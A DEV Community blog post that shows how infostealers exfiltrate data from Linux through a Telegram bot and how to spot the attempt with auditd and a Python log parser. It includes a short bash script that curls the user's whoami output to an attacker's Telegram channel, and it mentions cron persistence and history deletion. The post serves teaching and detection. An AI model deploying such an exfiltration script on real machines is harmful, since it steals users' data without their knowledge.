DEV Community

Paula

Linux Exfiltration

One of the most prominent threats right now is infostealers: malware that captures information from devices and sends the stolen data to an attacker. While this technique is integrated into other attacks (for example, ransomware), it can also work on its own, for selling data, cyber espionage and more.

In the past months, one of the most popular ways to exfiltrate data has been through Telegram or Discord bots (which are also used for C2, Command and Control).

I've been asked a few times how this is done, so in this article, I'm creating a very simple example of how Telegram could be used to exfiltrate and how to detect that attempt. Let's go!

Telegram bot

In order to do this, a Telegram Bot and a Channel are required. You need to create a bot with the help of BotFather and then create a Channel and add the bot to it. Send a message to the Channel and then use the following to get the Channel info:

https://api.telegram.org/bot<BotToken>/getUpdates

As described here, this will allow you to get the Channel ID. Once you know the channel ID, you can send a message using:

curl 'https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=<my message>'

Understanding this, we could create a script that enumerates the system information and sends a message describing it. Let's create a really simple example that just sends the whoami output. Of course, this could include many more things, such as architecture, disk info and more. Most of these sorts of samples will also attempt to check crypto wallet info.

Anyway, let's say we have the following script:

#!/bin/bash

messa=$(whoami)
mycommand="https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=$messa"

curl "$mycommand"


When this is executed, the username is sent to the channel.

Now, most of these will install the script in cron using crontab and delete the history log.

In case the crontab log is still intact, we will be able to see the crontab edit using cat /var/log/syslog | grep -w 'crontab'. But let's explore a cool option: auditd.

Now, installing auditd is fairly simple. And while you can create your own rules, you can also use a default configuration and you are good to go!

Now, if we use sudo cat /var/log/audit/audit.log | grep telegram | grep api we would be able to see the attempt of our script!
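
The same search done with a small parser, as an added example that is not code from the original post: auditd writes an argument containing a space or a double quote as an unquoted hex string, so grep telegram misses it. It assumes the audit rules record execve; the sample records, token placeholder and chat id are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')
EVENT_RE = re.compile(r"msg=audit\(([\d.]+):(\d+)\)")
BOT_PATH_RE = re.compile(r"^/bot[^/]+/(\w+)$")  # /bot<token>/<method>

def decode_argv(line):
    """Return the argv of one EXECVE record, decoding hex-encoded arguments."""
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(line):
        if hexed and len(hexed) % 2 == 0:  # unquoted value: hex-encoded by auditd
            quoted = bytes.fromhex(hexed).decode("utf-8", "replace")
        args[int(idx)] = quoted or hexed
    return [args[i] for i in sorted(args)]

def find_telegram_calls(log_text):
    """List EXECVE events whose arguments contain a Telegram Bot API URL."""
    hits = []
    for line in log_text.splitlines():
        event = EVENT_RE.search(line)
        if not line.startswith("type=EXECVE") or not event:
            continue
        argv = decode_argv(line)
        for arg in argv:
            try:
                url = urlsplit(arg)
            except ValueError:  # argument is not parseable as a URL
                continue
            method = BOT_PATH_RE.match(url.path)
            if url.hostname == "api.telegram.org" and method:
                query = parse_qs(url.query)
                hits.append({"event": event.group(2), "program": argv[0],
                             "method": method.group(1),
                             "chat_id": query.get("chat_id", [""])[0],
                             "text": query.get("text", [""])[0]})
    return hits

# Constructed sample records (placeholder token and chat id, not real data).
URL = "https://api.telegram.org/botTOKEN_PLACEHOLDER/sendMessage?chat_id=-1001&text="
SAMPLE_LOG = "\n".join([
    f'type=EXECVE msg=audit(1700000000.101:411): argc=2 a0="curl" a1="{URL}root"',
    f'type=EXECVE msg=audit(1700000000.202:412): argc=2 a0="curl" a1={(URL + "uid 0").encode().hex().upper()}',
    'type=EXECVE msg=audit(1700000000.303:413): argc=2 a0="cat" a1="/etc/hostname"',
])

if __name__ == "__main__":
    print(*find_telegram_calls(SAMPLE_LOG), sep="\n")
```

The second sample record is the one a plain grep for "telegram" does not match, because its URL argument contains a space and is stored as hex.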

Sometimes these attacks include tampering with /var/log, so maybe having a backup in a different path could be useful, too.

Anyway, this was a simple, friendly introduction. Expect more complex attacks! (and simpler, too :) )

If you are curious about analyzing real-life samples, take a look at my older posts about setting up a custom Linux honeypot. Most of the things I capture are miners, which can share some common characteristics with info-stealers (tampering with cron for persistence, attempting enumeration, attempting Dynamic Linker Hijacking attacks, and more).

Top comments (2)

Juan Julián Merelo Guervós

The exfiltrator stores their API key in plain text? Or is that encrypted somehow?

nigel447

time well spent reading this ++